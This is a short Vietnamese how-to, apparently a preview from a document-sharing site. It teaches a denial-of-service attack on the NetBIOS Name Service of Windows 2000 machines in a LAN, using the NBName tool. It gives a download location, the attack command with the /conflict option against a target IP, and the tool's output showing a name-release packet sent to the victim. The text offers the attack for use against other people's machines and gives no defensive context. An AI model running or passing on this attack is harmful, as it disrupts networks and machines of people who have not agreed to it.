Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (35.23 KB, 2 trang )
Tấn công DoS trong LAN
trang này đã được đọc lần
Từ trước tới giờ chắc các bạn chỉ nghe đến tấn công DoS trên internet , chứ chưa nghe đến DoS trên LAN đâu
nhỉ.
Có một tool giúp ta tấn công DoS vào dịch vụ NBNS (Net-BIOS Name Service) trên các máy dùng win2k trong
LAN thông qua protocol NetBIOS.
Lưu ý : trước khi dùng tool này , bạn phải ngắt service NetBIOS của protcol TCP/IP để tránh xung đột với
service NBNS hiện tại ( coi chừng gậy ông đập lưng ông ;-) ).
Rồi, bây giờ bạn download nbname tại download.tungxeng.net.ms. Unzip và thử tấn công thằng
192.168.234.222 xem sao (nbname chạy trong DOS):
C:\nbname /astat 192.168.234.222 /conflict
NBName v1.9 - Decodes and displays NetBIOS Name traffic (UDP 137), with options
Copyright 2000: Sir Dystic, Cult of the Dead Cow -:|:- New Hack City
Send complaints, ideas and donations to |
WinSock v2.0 (v2.2) WinSock 2.0
WinSock status: Running
Bound to port 137 on address 192.168.234.244
Broadcast address 192.168.234.255 Netmask: 255.255.255.0
**** NBSTAT QUERY packet sent to 192.168.234.222
Waiting for packets...
** Received 301 bytes from 192.168.234.222:137 via local net
at Web Jun 20 15:46:12 200
OPCode: QUERY
Flags: Response AuthoratativeAnswer
Answer [0]:
* <00>
Node Status Resource Record:
MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE
MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE
**** Name release sent to 192.168.234.222
....